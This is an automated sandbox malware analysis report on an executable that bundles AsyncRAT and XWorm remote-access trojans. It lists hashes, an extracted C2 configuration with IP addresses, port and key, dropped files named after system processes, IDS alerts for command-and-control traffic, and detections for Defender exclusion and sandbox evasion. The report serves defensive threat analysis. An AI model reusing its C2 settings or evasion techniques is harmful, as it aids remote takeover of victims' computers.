Windows Analysis Report
dLRcE11Dkl.exe

Overview

General Information

Sample name: dLRcE11Dkl.exe
renamed because original name is a hash value
Original sample name: 7eea25e9951efaa2c861551b031678b70e9e733c096877be5491457cb28561ab.exe
Analysis ID: 1561590
MD5: 68157ed3390faca2a327e25148f4bd97
SHA1: d5fa29334ce471ceac94be49a39d9398b13c8505
SHA256: 7eea25e9951efaa2c861551b031678b70e9e733c096877be5491457cb28561ab
Tags: exeuser-Chainskilabs
Infos:

Detection

AsyncRAT, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AsyncRAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
AsyncRAT AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
Name Description Attribution Blogpost URLs Link
XWorm Malware with wide range of capabilities ranging from RAT to ransomware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: dLRcE11Dkl.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Roaming\All function.cmd Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\svchost.exe Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Roaming\All function.exe Avira: detection malicious, Label: TR/Dropper.Gen
Found malware configuration
Source: 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["45.141.27.222"], "Port": 5000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Roaming\All function.cmd ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Roaming\Task Manager.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\svchost.exe ReversingLabs: Detection: 91%
Multi AV Scanner detection for submitted file
Source: dLRcE11Dkl.exe ReversingLabs: Detection: 68%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Task Manager.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\All function.cmd Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\svchost.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\All function.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: dLRcE11Dkl.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack String decryptor: 45.141.27.248
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack String decryptor: 7777
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack String decryptor: <123456789>
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack String decryptor: <Xwormmm>
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack String decryptor: XWorm V5.4
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack String decryptor: USB.exe
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack String decryptor: %AppData%
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack String decryptor: svchost.exe
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_b3b9f9c2-c
Uses 32bit PE files
Source: dLRcE11Dkl.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: dLRcE11Dkl.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: DC:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49991 -> 45.141.27.248:7777
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 45.141.27.248:7777 -> 192.168.2.6:49991
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49991 -> 45.141.27.248:7777
System process connects to network (likely due to code injection or exploit)
Source: C:\Users\user\AppData\Roaming\svchost.exe Network Connect: 208.95.112.1 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 45.141.27.222
Yara detected Generic Downloader
Source: Yara match File source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.All function.cmd.2ec0300.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.svchost.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.Task Manager.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.All function.cmd.2eafcc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Task Manager.exe, type: DROPPED
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
May check the online IP address of the machine
Source: unknown DNS query: name: ip-api.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: powershell.exe, 0000000A.00000002.2601444974.00000239A61A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m)IZ_
Source: powershell.exe, 0000000A.00000002.2601444974.00000239A61DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micros
Source: dLRcE11Dkl.exe, 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, All function.cmd, 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp, Task Manager.exe, 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp, All function.exe, 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, BLACKGODDOM V.2 GOD BY LA.exe, 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, BLACKGODDOM V.2 GOD BY LA.exe.5.dr String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000008.00000002.2476803020.00000251EABBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2520111925.000002399DBDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2327603396.000001A74D26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2840317416.0000023B539BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3249961564.000001C4BB09C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3354387858.000001F4DA2EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.2285781338.00000251DAD79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2297819455.000002398DD99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2270854842.000001A73D429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2436831061.0000023B43B7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2672516135.000001C4AB25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2735488760.000001F4CA4A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000008.00000002.2285781338.00000251DAB51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2297819455.000002398DB71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2270854842.000001A73D201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2436831061.0000023B43951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2672516135.000001C4AB031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2735488760.000001F4CA281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3112040346.000002D65E481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.2285781338.00000251DAD79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2297819455.000002398DD99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2270854842.000001A73D429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2436831061.0000023B43B7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2672516135.000001C4AB25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2735488760.000001F4CA4A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167495504.00007FF7720B5000.00000008.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000015.00000002.3481943443.000001F4E2A33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000008.00000002.2285781338.00000251DAB51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2297819455.000002398DB71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2270854842.000001A73D201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2436831061.0000023B43951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2672516135.000001C4AB031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2735488760.000001F4CA281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3112040346.000002D65E481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp, Ratty_win32_directx11.exe.5.dr String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://discord.gg/sGNBaJSzYD
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://discord.gg/sGNBaJSzYDstart
Source: powershell.exe, 00000017.00000002.3112040346.000002D65E6A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167495504.00007FF7720B5000.00000008.00000001.01000000.0000000A.sdmp String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
Source: powershell.exe, 00000008.00000002.2476803020.00000251EABBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2520111925.000002399DBDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2327603396.000001A74D26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2840317416.0000023B539BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3249961564.000001C4BB09C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3354387858.000001F4DA2EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3705239619.000002D66E4E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://qualityboy.rdcw.xyz/
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://qualityboy.rdcw.xyz/Rat
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167495504.00007FF7720B5000.00000008.00000001.01000000.0000000A.sdmp String found in binary or memory: https://scripts.sil.org/OFLThis
Source: Ratty_win32_directx11.exe, 00000006.00000000.2167495504.00007FF7720B5000.00000008.00000001.01000000.0000000A.sdmp String found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected AsyncRAT
Source: Yara match File source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: All function.exe PID: 1472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BLACKGODDOM V.2 GOD BY LA.exe PID: 5492, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.All function.cmd.2eafcc0.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.All function.cmd.2ec0300.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.0.svchost.exe.a20000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.All function.cmd.2ec0300.2.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.0.Task Manager.exe.3b0000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.All function.cmd.2eafcc0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Task Manager.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\All function.exe Code function: 5_2_00007FFD34780A21 5_2_00007FFD34780A21
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD34769EF3 8_2_00007FFD34769EF3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD3476947D 8_2_00007FFD3476947D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD34768E05 8_2_00007FFD34768E05
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD34763572 8_2_00007FFD34763572
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD34765EFA 8_2_00007FFD34765EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD34762715 8_2_00007FFD34762715
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD3476AB15 8_2_00007FFD3476AB15
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD34765BFA 8_2_00007FFD34765BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD3476B808 8_2_00007FFD3476B808
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD347A5CFA 10_2_00007FFD347A5CFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD347A34FA 10_2_00007FFD347A34FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD347A6081 10_2_00007FFD347A6081
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD347A89B5 10_2_00007FFD347A89B5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD347A26A3 10_2_00007FFD347A26A3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFD34798E05 12_2_00007FFD34798E05
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFD34795EFA 12_2_00007FFD34795EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFD347982C5 12_2_00007FFD347982C5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFD347926D3 12_2_00007FFD347926D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFD34790ED3 12_2_00007FFD34790ED3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFD34795BFA 12_2_00007FFD34795BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFD3479BBFB 12_2_00007FFD3479BBFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFD347834FA 16_2_00007FFD347834FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFD34785CFA 16_2_00007FFD34785CFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFD347825ED 16_2_00007FFD347825ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFD347889F2 16_2_00007FFD347889F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFD34789E01 16_2_00007FFD34789E01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFD3478B9BA 16_2_00007FFD3478B9BA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFD347836D2 16_2_00007FFD347836D2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFD34785BFA 16_2_00007FFD34785BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34778EFA 19_2_00007FFD34778EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD3477BA6A 19_2_00007FFD3477BA6A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD3477ABF2 19_2_00007FFD3477ABF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34775BFA 19_2_00007FFD34775BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD3477B828 19_2_00007FFD3477B828
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34770B9A 19_2_00007FFD34770B9A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_00007FFD347A84E3 21_2_00007FFD347A84E3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_00007FFD347A34B2 21_2_00007FFD347A34B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_00007FFD347A8DE5 21_2_00007FFD347A8DE5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_00007FFD347A89F2 21_2_00007FFD347A89F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_00007FFD347A26F5 21_2_00007FFD347A26F5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_00007FFD347A9FF3 21_2_00007FFD347A9FF3
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe A9BD5014B5A6744B0A5C180A3E76FF546A514DCBAD8BF2D8C500F903A285424B
Sample file is different than original file name gathered from version info
Source: dLRcE11Dkl.exe, 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesvchost.exe4 vs dLRcE11Dkl.exe
Uses 32bit PE files
Source: dLRcE11Dkl.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.All function.cmd.2eafcc0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.dLRcE11Dkl.exe.28278a8.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
